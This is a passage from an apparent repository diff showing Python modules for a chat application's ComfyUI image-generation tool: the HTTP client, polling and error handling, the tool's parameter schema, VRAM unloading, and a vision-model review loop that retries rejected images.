and the PNG at the end of it.
**The base URL is exempt from the SSRF guard, and that is deliberate rather than
forgotten.** `fetch.check_url` exists to stop a *model or a reader* pointing the
application at something on the private network; this address was typed by an
administrator into the admin page, exactly like `Connection.base_url` and the two
audio endpoints, none of which are checked either. Saying so here because the
default value is `127.0.0.1:8188`, which is precisely the shape the guard exists
to refuse and therefore looks like a hole rather than a decision.
Progress is **polled, not streamed**. ComfyUI offers a WebSocket for it, and
holding one open for the length of a generation is the live-connection state the
whole `agent/ssh.py` design forbids; polling `/history` is self-healing across a
restart of either side, and the thing being waited for takes tens of seconds, so
a poll costs nothing anybody can measure.
"""
from __future__ import annotations
import asyncio
import json
import logging
import time
import uuid
from dataclasses import dataclass
from typing import Any
import httpx
from lembas.services.llm.openai_client import (
LLMError,
describe_http_error,
)
log = logging.getLogger(__name__)
# What one generated image may weigh. A cap is required rather than tidy: this is
# the only place in the codebase where an external service hands back raw bytes
# that are then written to disk, and neither `audio.speak` nor `openai_client`
# has one to copy. Generous, because a 2048px PNG is a legitimate several
# megabytes and refusing it would be refusing the feature.
MAX_IMAGE_BYTES = 32 * 1024 * 1024
# How often to ask whether it has finished, and how long to keep asking. The
# interval is not adaptive: unlike a background job, which may run for hours,
# a generation is over in tens of seconds and the whole reply is parked on it.
POLL_INTERVAL = 1.0
# How long to wait for the queue *before* our own job starts running. A busy
# ComfyUI with somebody else's batch in front of us is not an error.
DEFAULT_TIMEOUT = 600.0
@dataclass(frozen=True)
class Config:
"""Everything a call needs, lifted out of the settings group.
A snapshot rather than a session, for the reason `ToolContext` is one: a
generation outlives the request that resolved it.
"""
base_url: str
api_key: str = ""
timeout: float = DEFAULT_TIMEOUT
@property
def configured(self) -> bool:
return bool(self.base_url)
def url(self, path: str) -> str:
return f"{self.base_url.rstrip('/')}/{path.lstrip('/')}"
def headers(self) -> dict[str, str]:
# ComfyUI itself has no auth; a key is only ever for something in front
# of it, so an empty one must not become `Authorization: Bearer `.
return {"Authorization": f"Bearer {self.api_key}"} if self.api_key else {}
@dataclass(frozen=True)
class Ref:
"""Where a finished image lives on the far side."""
filename: str
subfolder: str = ""
kind: str = "output"
class ComfyError(LLMError):
"""Anything that stopped a generation, in words worth showing somebody."""
class OutOfMemory(ComfyError):
"""The far side ran out of VRAM.
Its own class because it is the one failure with an obvious next move --
a smaller picture, or a smaller checkpoint -- and the model is told to make
it. Everything else is reported and stopped at.
"""
class Interrupted(ComfyError):
"""Somebody cancelled it from ComfyUI's own interface, or it was stopped.
Distinct because it is not a fault: retrying is reasonable, and "the
workflow failed" would be describing a decision as a breakage.
"""
# What `exception_type` looks like when a GPU has run out. Matched on the type
# rather than on the message, which is a paragraph of allocator advice written
# for whoever is running the box and not for a model.
_OOM_TYPES = ("outofmemory", "out_of_memory", "cuda error: out of memory")
def _transport_error(exc: httpx.RequestError, config: Config) -> ComfyError:
"""The `wrap_transport_error` shape, said about ComfyUI rather than an LLM.
Not reused directly: that one names the request timeout from the deployment
settings, which is not the timeout in force here.
"""
if isinstance(exc, httpx.ConnectError):
return ComfyError(
f"Could not reach ComfyUI at {config.base_url}. Is it running and the URL correct?"
)
if isinstance(exc, httpx.TimeoutException):
return ComfyError(f"ComfyUI at {config.base_url} did not respond in time.")
return ComfyError(f"Could not reach ComfyUI at {config.base_url}: {exc}")
async def _get_json(config: Config, path: str, *, timeout: float = 30.0) -> Any:
try:
async with httpx.AsyncClient(timeout=timeout) as client:
response = await client.get(config.url(path), headers=config.headers())
response.raise_for_status()
return response.json()
except httpx.HTTPStatusError as exc:
raise ComfyError(describe_http_error(exc), status_code=exc.response.status_code) from exc
except httpx.RequestError as exc:
raise _transport_error(exc, config) from exc
except (ValueError, json.JSONDecodeError) as exc:
raise ComfyError(f"ComfyUI sent something that is not JSON: {exc}") from exc
async def submit(config: Config, workflow: dict[str, Any]) -> str:
"""Queue a workflow, and answer with the id it was given.
A `node_errors` block is a refusal rather than a failure: the workflow was
accepted as JSON and rejected as a graph, usually because a checkpoint name
does not exist on that machine. It is reported with the node named, because
"invalid prompt" against a twelve-node document says nothing.
"""
body = {"prompt": workflow, "client_id": uuid.uuid4().hex}
try:
async with httpx.AsyncClient(timeout=60.0) as client:
response = await client.post(config.url("prompt"), headers=config.headers(), json=body)
if response.status_code >= 400:
raise ComfyError(_refusal(response))
data = response.json()
except ComfyError:
raise
except httpx.RequestError as exc:
raise _transport_error(exc, config) from exc
except (ValueError, json.JSONDecodeError) as exc:
raise ComfyError(f"ComfyUI sent something that is not JSON: {exc}") from exc
if errors := (data.get("node_errors") or {}):
raise ComfyError(_describe_nodes(errors))
prompt_id = str(data.get("prompt_id") or "")
if not prompt_id:
raise ComfyError("ComfyUI accepted the workflow but did not say what to call it.")
return prompt_id
def _refusal(response: httpx.Response) -> str:
"""Why ComfyUI would not take a workflow, in one sentence."""
try:
payload = response.json()
except (ValueError, json.JSONDecodeError):
return f"ComfyUI refused the workflow (HTTP {response.status_code})."
if isinstance(payload, dict):
if errors := (payload.get("node_errors") or {}):
return _describe_nodes(errors)
if message := payload.get("error"):
if isinstance(message, dict):
message = message.get("message") or message.get("type") or ""
return f"ComfyUI refused the workflow: {message}"
return f"ComfyUI refused the workflow (HTTP {response.status_code})."
def _describe_nodes(errors: dict[str, Any]) -> str:
parts: list[str] = []
for node, detail in list(errors.items())[:4]:
messages = detail.get("errors") if isinstance(detail, dict) else None
first = ""
if isinstance(messages, list) and messages:
entry = messages[0]
first = entry.get("message", "") if isinstance(entry, dict) else str(entry)
parts.append(f"node {node}: {first}" if first else f"node {node}")
return "ComfyUI refused the workflow — " + "; ".join(parts)
async def await_images(config: Config, prompt_id: str) -> list[Ref]:
"""Wait for one queued workflow and answer with what it saved.
**The record existing is what "finished" means, not `status.completed`.**
ComfyUI writes the history entry in `task_done` and nowhere else, so it
appears exactly once the job is over -- but it sets `completed=e.success`,
so a run that failed is `completed: false` for ever. Waiting on that flag
means every out-of-memory, every cancelled job and every broken node hangs
the reply for the whole timeout and then reports a timeout, when ComfyUI
knew what was wrong within seconds and said so.
So: no record means not yet, a record means done, and `status_str` says
which kind of done.
"""
deadline = time.monotonic() + config.timeout
while True:
record = (await _get_json(config, f"history/{prompt_id}")).get(prompt_id)
if isinstance(record, dict) and record.get("status") is not None:
status = record.get("status") or {}
if status.get("status_str") != "success":
raise _failure(status)
return _refs_in(record.get("outputs") or {})
if time.monotonic() > deadline:
raise ComfyError(
f"ComfyUI did not finish within {config.timeout:.0f}s. "
"It may still be working; the queue is on its own page."
)
await asyncio.sleep(POLL_INTERVAL)
def _failure(status: dict[str, Any]) -> ComfyError:
"""Why a workflow stopped, out of the messages ComfyUI recorded against it.
`status.messages` is a list of `[name, payload]` pairs -- the lifecycle of
the run. The last `execution_error` or `execution_interrupted` in it is the
thing that ended it, and carries the node and the exception. Without reading
these the only thing that could be said is "error", which is what ComfyUI's
own status string amounts to.
"""
event, payload = "", {}
for entry in status.get("messages") or []:
if isinstance(entry, list | tuple) and len(entry) == 2:
name, body = entry
if name in ("execution_error", "execution_interrupted"):
event, payload = str(name), body if isinstance(body, dict) else {}
node = str(payload.get("node_type") or "").strip()
where = f" in {node}" if node else ""
if event == "execution_interrupted":
return Interrupted(f"The image was cancelled on the ComfyUI side{where}.")
kind = str(payload.get("exception_type") or "")
detail = _first_sentence(str(payload.get("exception_message") or ""))
if any(marker in kind.lower() for marker in _OOM_TYPES) or "out of memory" in detail.lower():
return OutOfMemory(f"ComfyUI ran out of video memory{where}. {detail}".strip())
if not detail and not kind:
return ComfyError(f"ComfyUI could not finish the workflow{where}.")
return ComfyError(f"ComfyUI could not finish the workflow{where}: {detail or kind}")
def _first_sentence(message: str) -> str:
"""Enough of an exception to act on, and no more.
A torch OOM runs to several lines of allocator advice -- environment
variables to set, fragmentation notes -- addressed to whoever runs the box.
None of it means anything to a model, and all of it costs tokens in a tool
result that is already a failure.
"""
first = message.strip().split("\n", 1)[0].strip()
if len(first) > 200:
first = first[:200].rsplit(" ", 1)[0] + ""
return first
def _refs_in(outputs: dict[str, Any]) -> list[Ref]:
"""Every image any node saved, in node order.
Every node is read rather than a `SaveImage` being looked for by name: a
template is somebody else's document and may save from a node called
anything, or from two of them.
"""
refs: list[Ref] = []
for node in outputs.values():
for image in (node or {}).get("images") or []:
if filename := str(image.get("filename") or ""):
refs.append(
Ref(
filename=filename,
subfolder=str(image.get("subfolder") or ""),
kind=str(image.get("type") or "output"),
)
)
return refs
async def fetch_image(config: Config, ref: Ref) -> bytes:
"""The bytes of one finished image."""
params = {"filename": ref.filename, "subfolder": ref.subfolder, "type": ref.kind}
try:
async with httpx.AsyncClient(timeout=120.0) as client:
response = await client.get(config.url("view"), headers=config.headers(), params=params)
response.raise_for_status()
payload = response.content
except httpx.HTTPStatusError as exc:
raise ComfyError(describe_http_error(exc), status_code=exc.response.status_code) from exc
except httpx.RequestError as exc:
raise _transport_error(exc, config) from exc
if not payload:
raise ComfyError(f"ComfyUI returned an empty file for {ref.filename}.")
if len(payload) > MAX_IMAGE_BYTES:
raise ComfyError(
f"{ref.filename} is {len(payload) // (1024 * 1024)}MB, over the "
f"{MAX_IMAGE_BYTES // (1024 * 1024)}MB limit."
)
return payload
async def free(config: Config) -> None:
"""Ask ComfyUI to drop its models from memory.
Best-effort by design and never raised into the caller: this runs on the way
out of a generation that has already produced its image, and failing the
whole tool because a memory hint was refused would be turning a tidy-up into
an error. The consequence of it silently not working is VRAM staying used,
which is the state Preserve VRAM was already in before it was switched on.
"""
try:
async with httpx.AsyncClient(timeout=30.0) as client:
await client.post(
config.url("free"),
headers=config.headers(),
json={"unload_models": True, "free_memory": True},
)
except Exception: # noqa: BLE001 - a hint that failed is not a failed generation
log.debug("could not free ComfyUI at %s", config.base_url, exc_info=True)
async def discover(config: Config) -> tuple[list[str], list[str], list[str]]:
"""What this ComfyUI can actually do: checkpoints, samplers, schedulers.
For the admin page only. Never called from the request path -- the tool
reads the stored lists, exactly as the project listing is read from a cache
rather than walked, because a keystroke must not wait on a machine.
"""
checkpoints = _options(
await _get_json(config, "object_info/CheckpointLoaderSimple"),
"CheckpointLoaderSimple",
"ckpt_name",
)
sampler_info = await _get_json(config, "object_info/KSampler")
samplers = _options(sampler_info, "KSampler", "sampler_name")
schedulers = _options(sampler_info, "KSampler", "scheduler")
return checkpoints, samplers, schedulers
def _options(payload: Any, node: str, field: str) -> list[str]:
"""The allowed values of one input, out of an `/object_info` document.
The shape is `{node: {input: {required: {field: [[...values], {...meta}]}}}}`
-- a list whose first element is the list of options. Read defensively: this
is somebody else's schema and a custom node pack can change it.
"""
try:
spec = payload[node]["input"]["required"][field][0]
except (KeyError, IndexError, TypeError):
return []
return [str(value) for value in spec] if isinstance(spec, list) else []
-711
View File
@@ -1,711 +0,0 @@
"""The tool that makes a picture, and the loop that decides to keep it.
One call is one finished image. The alternative -- return every attempt to the
conversation and let the model decide whether to call again -- costs a full
round per retry, makes the ceiling advisory rather than enforced, and shows the
reader every reject on the way past. So the retrying happens here, and what
comes back is the image that was kept.
**Three things are ordered rather than incidental.**
*The reviewer is asked about bytes, not about a row.* An attempt that is going
to be thrown away should not leave an `Attachment` behind, so the judge is shown
a downscaled preview built in memory and only the kept image is ever written.
*Preserve VRAM swaps around the review, not around the tool.* The sequence is
unload the LLM, generate, free ComfyUI, ask the reviewer (which loads the LLM
again), and round once more if it said no. Two model loads per retry, which is
why the two settings are independent and the admin page says so.
*Nothing loads the LLM back at the end.* The reply's next request does it, and
llama-swap -- or Ollama, or anything else worth pointing this at -- loads on
demand. A step that exists in the description and not in the code looks like an
omission, so it is said here instead.
"""
from __future__ import annotations
import json
import logging
import re
from dataclasses import dataclass
from typing import Any
import httpx
from sqlalchemy import select
from lembas.services.images import comfy, workflow
from lembas.services.llm.openai_client import Endpoint, LLMError, complete
from lembas.services.tools import RISK_WRITE, ToolContext, ToolDef, ToolOutcome
log = logging.getLogger(__name__)
# What the reviewer is allowed to write back. It is one verdict and one line of
# reason, and a model that writes an essay about a picture is a model whose
# answer nobody reads.
MAX_VERDICT_TOKENS = 200
# How long to wait for a connection to admit it has unloaded. Short: this is a
# hint before a slow operation, and a machine that will not answer it is one
# where the generation should go ahead anyway rather than fail.
UNLOAD_TIMEOUT = 30.0
SCHEMA: dict[str, Any] = {
"type": "object",
"properties": {
# First, and the only required one, because `tools.parse_arguments`
# puts the whole raw string into the first required parameter when a
# model emits arguments that are not valid JSON. That failure is common
# with small models, and this way it degrades into a prompt rather than
# into a seed.
"prompt": {
"type": "string",
"description": "What to draw. Describe the subject, the setting and the style.",
},
# Every description below says what the value *does to the picture* and
# when to move it, not what it is called. A model that is told "cfg:
# prompt adherence, default 8" has been told nothing it can act on, and
# the observable result is a model that sends the prompt alone and
# leaves ten parameters at their defaults for ever.
"negative": {
"type": "string",
"description": (
"Comma-separated things to keep OUT of the picture, as plain nouns and "
"adjectives: 'blurry, extra fingers, text, watermark'. Not a sentence, "
"and never phrased as an instruction — 'do not add text' puts *text* in "
"the picture. Defaults to 'text, watermark'."
),
},
"template": {
"type": "string",
"description": "Which workflow to use. Omit to use this chat's usual one.",
},
"model": {
"type": "string",
"description": (
"Which checkpoint to draw with. Pick by what it is good at; omit to use "
"this chat's usual one."
),
},
"seed": {
"type": "integer",
"description": (
"Omit it, or pass -1, for a new random image. Repeat a seed you were "
"told about to get that same image again — which is how you change one "
"thing about a picture and keep the rest."
),
},
"steps": {
"type": "integer",
"description": (
"How long to refine, 1-150. Default 20. Around 20-30 for most things; "
"8-12 for a quick draft or when several are wanted; 40+ only for fine "
"detail, and past about 50 it stops improving and only costs time."
),
},
"cfg": {
"type": "number",
"description": (
"How literally to follow the prompt, 0-30. Default 8. 3-6 gives the "
"model room and looks more natural; 7-9 is the usual range; 12+ forces "
"the words through and starts to look burnt and over-saturated. Lower "
"it if the picture looks harsh, raise it if the subject is being "
"ignored."
),
},
"width": {
"type": "integer",
"description": (
"Pixels, 64-2048, a multiple of 8. Default 512. Use the size the "
"checkpoint was trained for — about 512 for SD1.5, about 1024 for SDXL "
"— and change the ratio rather than the total: 512x768 for a portrait, "
"768x512 for a landscape. Going far above what the checkpoint expects "
"produces duplicated limbs and repeated horizons, not more detail."
),
},
"height": {
"type": "integer",
"description": (
"Pixels, 64-2048, a multiple of 8. Default 512. See width: the aspect "
"ratio is the thing to choose, and taller than wide suits a person, "
"wider than tall suits a place."
),
},
"sampler": {
"type": "string",
"description": (
"How the image is solved. Default euler. 'euler' is safe and fast; "
"'dpmpp_2m' is a good general improvement; 'dpmpp_2m_sde' for more "
"texture; 'ddim' for a clean flat look. Leave it out unless you have a "
"reason."
),
},
"scheduler": {
"type": "string",
"description": (
"How the steps are spaced. Default normal. 'karras' pairs well with the "
"dpmpp samplers and usually helps at low step counts; 'normal' "
"otherwise. Leave it out unless you are also setting the sampler."
),
},
"denoise": {
"type": "number",
"description": (
"How much of the starting noise to replace, 0-1. Default 1, which is "
"what you want for a picture drawn from nothing. Lower values only mean "
"something for a workflow that starts from an existing image."
),
},
},
"required": ["prompt"],
}
@dataclass(frozen=True)
class Attempt:
"""One generated image and what was decided about it."""
number: int
seed: int
kept: bool
verdict: str = ""
def config_of(context: ToolContext) -> comfy.Config:
"""The client snapshot, with the key decrypted at the last moment."""
from lembas.services.crypto import decrypt
values = context.image_config or {}
return comfy.Config(
base_url=str(values.get("base_url") or ""),
api_key=decrypt(str(values.get("api_key_encrypted") or "")),
timeout=float(values.get("timeout") or comfy.DEFAULT_TIMEOUT),
)
def _choices(db, values: dict[str, Any]) -> tuple[list[Any], list[str]]:
"""The templates and checkpoints on offer, for the schema and the harness."""
from lembas.db.models import ImageWorkflow
rows = list(
db.scalars(
select(ImageWorkflow)
.where(ImageWorkflow.enabled.is_(True))
.order_by(ImageWorkflow.position, ImageWorkflow.slug)
)
)
return rows, [str(name) for name in (values.get("checkpoints") or [])]
_DEFAULT_SENTENCE = re.compile(r"Default ([^.,]+)([.,])")
def _restate_defaults(schema: dict[str, Any], values: dict[str, Any]) -> None:
"""Rewrite each "Default 20." to say what this instance actually uses.
Every one of those descriptions was written when there was one set of
defaults in the world. Now an administrator can move them, and a schema
still saying "Default 512" beside an instance that draws at 1024 is worse
than saying nothing: the model reasons from it, decides 512 is fine for the
SDXL checkpoint it was handed, and omits the parameter arriving at the
right behaviour for the wrong reason, or the wrong one silently.
A rewrite rather than a `{default}` placeholder in the prose, because the
sentence around it differs per parameter and half of them go on to say what
to do *instead* of the default. The regex keeps the punctuation it found,
since `denoise` says "Default 1, which is…" and the rest use a full stop.
"""
resolved = workflow.resolve({}, settings=values)
for name, spec in schema.get("properties", {}).items():
if name not in resolved or name in ("prompt", "seed", "model", "template"):
continue
shown = resolved[name]
# A float that is whole reads better as "8" than "8.0", and this is the
# text a model reasons about.
if isinstance(shown, float) and shown.is_integer():
shown = int(shown)
spec["description"] = _DEFAULT_SENTENCE.sub(
# Bound now rather than closed over: `shown` is a loop variable, and
# a lambda reading it later would restate every description with the
# last parameter's value.
lambda match, shown=shown: f"Default {shown}{match.group(2)}",
spec["description"],
count=1,
)
def schema_for(db, values: dict[str, Any]) -> dict[str, Any]:
"""The parameter schema, with this instance's own choices in it.
`template` and `model` become enums because a name that does not exist is a
refusal from ComfyUI and a wasted round; `sampler` and `scheduler` stay
plain strings because there are forty-four and nine of them, and an enum
that size costs tokens on every request forever to prevent a mistake worth
one sentence of correction.
"""
rows, checkpoints = _choices(db, values)
schema = json.loads(json.dumps(SCHEMA))
_restate_defaults(schema, values)
if rows:
schema["properties"]["template"]["enum"] = [row.slug for row in rows]
schema["properties"]["template"]["description"] = "Which workflow to use. " + "; ".join(
f"{row.slug}: {row.description or row.name}" for row in rows[:12]
)
if checkpoints:
schema["properties"]["model"]["enum"] = checkpoints
return schema
def tool_def(db, values: dict[str, Any]) -> ToolDef:
return ToolDef(
name="image_generate",
family="image",
description=(
"Draw a picture from a description and show it to the person you are "
"talking to. Returns once the image has been made and is on screen."
),
parameters=schema_for(db, values),
run=run,
# Not RISK_READ: it spends somebody's GPU for a minute and puts a new
# artefact in the conversation. In an agent chat that means the mode
# decides whether to ask first, which is the right answer for a call
# that cannot be undone by reading something again.
risk=RISK_WRITE,
)
# --- Preserve VRAM -------------------------------------------------------------
async def _unload_llm(context: ToolContext) -> bool:
"""Ask this chat's own endpoint to drop its model. Best-effort.
*This chat's own* is the whole of the design. The unload hook is a column on
`Connection`, so a chat talking to a local llama-swap unloads that and a
chat talking to a box on the network unloads nothing -- its VRAM is not the
VRAM ComfyUI is about to want.
"""
from lembas.db.models import Connection
from lembas.db.session import session_scope
url = ""
method = "POST"
try:
with session_scope() as db:
connection = db.get(Connection, context.connection_id)
if connection is not None:
url = (connection.unload_url or "").strip()
method = (connection.unload_method or "POST").upper()
except Exception: # noqa: BLE001 - a hint that could not be looked up is not a failure
log.debug("could not read the unload hook", exc_info=True)
return False
if not url:
return False
try:
async with httpx.AsyncClient(timeout=UNLOAD_TIMEOUT) as client:
await client.request(method, url)
return True
except Exception: # noqa: BLE001 - see the module docstring: a hint, not a step
log.info("could not unload the model at %s", url, exc_info=True)
return False
# --- The reviewer --------------------------------------------------------------
def _reviewer(context: ToolContext) -> tuple[Endpoint, str] | None:
"""The model that judges an image, or None if there is nobody to ask.
The admin's choice first, then the chat's own model when it has vision. A
chat on a text-only model with no reviewer configured simply keeps the first
image, which is the behaviour with review switched off -- said here rather
than failing, because "you asked for a picture and got an error about
vision" is a worse answer than a picture.
"""
from lembas.db.models import Connection, Model
from lembas.db.session import session_scope
values = context.image_config or {}
if not values.get("review_enabled"):
return None
wanted = str(values.get("review_model_id") or "")
try:
with session_scope() as db:
model = None
if wanted:
model = db.get(Model, wanted)
if model is None and context.model_id:
model = db.scalar(
select(Model).where(
Model.model_id == context.model_id,
Model.connection_id == context.connection_id,
)
)
if model is None or not (model.capabilities_json or {}).get("vision"):
return None
connection = db.get(Connection, model.connection_id)
if connection is None or not connection.enabled:
return None
return Endpoint.from_connection(connection), model.model_id
except Exception: # noqa: BLE001 - no reviewer is a degraded mode, not an error
log.warning("could not resolve an image reviewer", exc_info=True)
return None
async def _review(
context: ToolContext, endpoint: Endpoint, model_id: str, prompt: str, payload: bytes
) -> tuple[bool, str]:
"""Show the reviewer the image and ask whether to keep it.
Answers `(keep, reason)`. **Anything that goes wrong is a keep**: the
reviewer is a second opinion on a picture that already exists, and losing an
image because a judging request timed out would be the check destroying the
thing it was checking.
"""
from lembas.db.session import session_scope
from lembas.services import files as files_service
from lembas.services import prompts as prompts_service
preview = files_service.preview_data_uri(payload, max_edge=768)
if preview is None:
return True, ""
with session_scope() as db:
instruction = prompts_service.resolve(db, "task.image_review")
# An administrator who cleared the fragment has switched reviewing off, the
# same way clearing `task.compact` switches compaction off. Nothing is asked
# of anyone and the image is kept.
if not instruction.strip():
return True, ""
body = {
"model": model_id,
"messages": [
{"role": "system", "content": instruction},
{
"role": "user",
"content": [
{"type": "text", "text": f"The request was: {prompt}"},
{"type": "image_url", "image_url": {"url": preview}},
],
},
],
"max_tokens": MAX_VERDICT_TOKENS,
"temperature": 0,
}
try:
answer = (await complete(endpoint, body)).strip()
except LLMError as exc:
log.info("could not review a generated image: %s", exc.message)
return True, ""
verdict, _, reason = answer.partition("\n")
keep = not verdict.strip().upper().startswith("RETRY")
return keep, (reason or verdict).strip()[:300]
# --- The runner ----------------------------------------------------------------
def _over_quota(context: ToolContext) -> str:
"""Why this account may not draw another picture today, or "".
Its own session, opened and closed before anything else: this runs before a
request that takes a minute, and holding a session across one is the trade
every long call in this codebase already refuses.
"""
from lembas.db.models import User
from lembas.db.session import session_scope
from lembas.services import usage as usage_service
if not context.owner_id:
return ""
with session_scope() as db:
return usage_service.over_image_budget(db, db.get(User, context.owner_id))
async def run(context: ToolContext, args: dict[str, Any]) -> ToolOutcome:
"""Generate one image, review it if there is anybody to ask, and keep one."""
from lembas.db.session import session_scope
from lembas.services import files as files_service
event: dict[str, Any] = {
"name": "image_generate",
"kind": "image",
"query": str(args.get("prompt") or "")[:200],
"results": [],
}
prompt = str(args.get("prompt") or "").strip()
if not prompt:
return ToolOutcome(
"No prompt was given, so nothing was drawn. Say what the picture should show.",
{**event, "status": "error", "error": "No prompt."},
)
if not context.chat_id:
return ToolOutcome(
"Images can only be generated inside a chat.",
{**event, "status": "error", "error": "No chat."},
)
# Before a minute of somebody's GPU is spent. Its own quota because it is
# its own cost: a picture is no tokens at all, so a token budget says
# nothing about how many of them one account may make.
over = _over_quota(context)
if over:
return ToolOutcome(over, {**event, "status": "error", "error": over})
values = context.image_config or {}
config = config_of(context)
if not config.configured:
return ToolOutcome(
"No image generator is configured on this instance.",
{**event, "status": "error", "error": "No ComfyUI configured."},
)
# Resolve the template and the checkpoint: what the model asked for, then
# this chat's usual, then the instance default. Every rung is a preference
# and none of them is a constraint, which is what lets a model that only
# wrote a prompt still get a picture.
try:
with session_scope() as db:
rows, checkpoints = _choices(db, values)
wanted = str(args.get("template") or "")
chosen = _pick(rows, wanted, context.image_workflow_id, values)
if chosen is None:
return ToolOutcome(
"No image workflow has been set up on this instance.",
{**event, "status": "error", "error": "No workflow."},
)
template = json.loads(json.dumps(chosen.workflow_json or {}))
template_slug, template_name = chosen.slug, chosen.name
except ToolOutcome: # pragma: no cover - defensive
raise
except Exception as exc: # noqa: BLE001
log.exception("could not resolve an image workflow")
return ToolOutcome(
f"The image workflow could not be read: {exc}",
{**event, "status": "error", "error": str(exc)},
)
checkpoint = _checkpoint(
str(args.get("model") or ""),
context.image_checkpoint,
checkpoints,
instance_default=str(values.get("default_checkpoint") or ""),
)
if checkpoint is None:
return ToolOutcome(
"No checkpoint is available. An administrator has to list them on the "
"image generation page.",
{**event, "status": "error", "error": "No checkpoint."},
)
given = {name: args.get(name) for name in workflow.MODEL_SETTABLE if name in args}
given["model"] = checkpoint
given["prompt"] = prompt
reviewer = _reviewer(context)
tries = int(values.get("max_tries") or 1) if reviewer else 1
preserve = bool(values.get("preserve_vram"))
attempts: list[Attempt] = []
kept: tuple[bytes, dict[str, Any]] | None = None
# What the last attempt actually asked for, so a failure can name concrete
# numbers back at the model rather than saying "try something smaller".
params_used: dict[str, Any] = workflow.resolve(given, settings=values)
try:
for number in range(1, tries + 1):
if preserve:
await _unload_llm(context)
params = workflow.resolve(
{**given, "seed": args.get("seed") if number == 1 else None}, settings=values
)
params_used = params
refs = await comfy.await_images(
config, await comfy.submit(config, workflow.fill(template, params))
)
if not refs:
raise comfy.ComfyError("ComfyUI finished but saved no image.")
payload = await comfy.fetch_image(config, refs[0])
if preserve:
await comfy.free(config)
if reviewer is None:
attempts.append(Attempt(number, params["seed"], kept=True))
kept = (payload, params)
break
endpoint, model_id = reviewer
keep, reason = await _review(context, endpoint, model_id, prompt, payload)
last = number == tries
attempts.append(Attempt(number, params["seed"], kept=keep or last, verdict=reason))
if keep or last:
kept = (payload, params)
break
except comfy.ComfyError as exc:
if preserve:
# It failed *inside* the far side, so its models are still resident
# and the language model is still unloaded. Freeing here is what
# lets the reply carry on and say what happened.
await comfy.free(config)
return ToolOutcome(
f"The image could not be generated: {exc.message}{_advice(exc, params_used)}",
{**event, "status": "error", "error": exc.message},
)
if preserve:
await comfy.free(config)
if kept is None: # pragma: no cover - the loop always keeps its last attempt
return ToolOutcome(
"Nothing was generated.", {**event, "status": "error", "error": "No image."}
)
payload, params = kept
try:
with session_scope() as db:
attachment = files_service.store(
db,
user_id=context.owner_id,
chat_id=context.chat_id,
payload=payload,
filename=f"{template_slug}-{params['seed']}.png",
# What ComfyUI made, at the size it made it. See `_keep_image`.
keep_original=True,
source_label="Image generation",
source_path=f"{checkpoint} · seed {params['seed']}",
)
attachment_id = attachment.id
width, height = attachment.width, attachment.height
except Exception as exc: # noqa: BLE001
log.exception("could not store a generated image")
return ToolOutcome(
f"The image was generated but could not be saved: {exc}",
{**event, "status": "error", "error": str(exc)},
)
return ToolOutcome(
_describe(prompt, template_name, checkpoint, params, attempts),
{
**event,
"status": "ok",
"detail": f"{template_name} · {checkpoint}",
"text": _transcript(params, attempts),
# Bound to the reply by `generation._persist`, the single writer. A
# runner may create the row; only the loop may say which turn owns
# it.
"attachment_id": attachment_id,
"image": {"id": attachment_id, "width": width, "height": height},
},
)
def _advice(exc: comfy.ComfyError, params: dict[str, Any]) -> str:
"""What to do about a failure, when there is something to do about it.
Only for the two that have an obvious next move. Everything else gets the
reason and nothing else -- a model told to "try again" after a broken
workflow will try the identical thing, and a suggestion invented for a
failure nobody understands is a guess wearing the application's authority.
The numbers are concrete on purpose. "Use a lower resolution" against a
request that was already 512x512 is advice that cannot be followed, so the
halved size is worked out here where the request is known.
"""
if isinstance(exc, comfy.Interrupted):
return (
" Somebody stopped it deliberately, so do not simply start it again — say so and ask."
)
if not isinstance(exc, comfy.OutOfMemory):
return ""
width, height = int(params.get("width") or 512), int(params.get("height") or 512)
smaller = f"{max(256, width // 2)}x{max(256, height // 2)}"
return (
f" Try once more at a smaller size — {smaller} instead of {width}x{height}"
"or with a lighter checkpoint if one is offered. Do not repeat the same "
"request unchanged; it will run out of memory again."
)
def _pick(rows: list[Any], wanted: str, chat_default: str, values: dict[str, Any]) -> Any:
"""The workflow to use: asked for, then the chat's, then the instance's."""
by_slug = {row.slug: row for row in rows}
if wanted and wanted in by_slug:
return by_slug[wanted]
by_id = {row.id: row for row in rows}
if chat_default and chat_default in by_id:
return by_id[chat_default]
fallback = str(values.get("default_workflow_id") or "")
if fallback and fallback in by_id:
return by_id[fallback]
return rows[0] if rows else None
def _checkpoint(
wanted: str, chat_default: str, available: list[str], *, instance_default: str = ""
) -> str | None:
"""The checkpoint to draw with, on the same ladder.
Most specific first: what the model named, then this chat's own, then the
instance default, then whatever is first in the list. The instance rung is
the new one -- without it, "the default" was position zero in a textarea an
administrator had typed in some order, which is a default by accident.
A name the instance does not have is ignored at every rung rather than
passed through: it would reach ComfyUI, be refused, and cost a round to
discover -- and the model was shown the list it may choose from.
"""
if wanted and wanted in available:
return wanted
if chat_default and chat_default in available:
return chat_default
if instance_default and instance_default in available:
return instance_default
return available[0] if available else None
def _describe(
prompt: str, template: str, checkpoint: str, params: dict[str, Any], attempts: list[Attempt]
) -> str:
"""What the model reads back.
It is told the image is already on screen, because otherwise the commonest
next thing it does is offer to show it -- and there is nothing it could do
to comply.
"""
lines = [
"The image has been generated and is shown to them. It is not a link and "
"needs no further action.",
f"Prompt: {prompt}",
f"Template {template}, checkpoint {checkpoint}, "
f"{params['width']}x{params['height']}, seed {params['seed']}, "
f"{params['steps']} steps, cfg {params['cfg']}.",
]
if len(attempts) > 1:
rejected = [a for a in attempts if not a.kept]
lines.append(
f"It took {len(attempts)} attempts; the earlier ones were rejected on review "
f"({'; '.join(a.verdict for a in rejected if a.verdict) or 'no reason given'})."
)
return "\n".join(lines)
def _transcript(params: dict[str, Any], attempts: list[Attempt]) -> str:
"""What the reader sees when they open the tool block.
The rejected attempts are recorded here and their images are not kept. A
transcript full of pictures somebody's model decided against is noise, and
the disk they would occupy buys nothing -- what is worth knowing is that it
took three goes and why the first two did not do.
"""
lines = [
f"seed {params['seed']} · {params['steps']} steps · cfg {params['cfg']} · "
f"{params['sampler']}/{params['scheduler']} · denoise {params['denoise']}"
]
if len(attempts) > 1:
lines.append("")
for attempt in attempts:
state = "kept" if attempt.kept else "rejected"
reason = f"{attempt.verdict}" if attempt.verdict else ""
lines.append(f"Attempt {attempt.number} (seed {attempt.seed}): {state}{reason}")
return "\n".join(lines)
-257
View File
@@ -1,257 +0,0 @@
"""Turning a stored template and a model's arguments into a ComfyUI workflow.
A template is an API-format workflow with `{{placeholders}}` where the values
go. Which node holds the prompt is therefore the administrator's statement
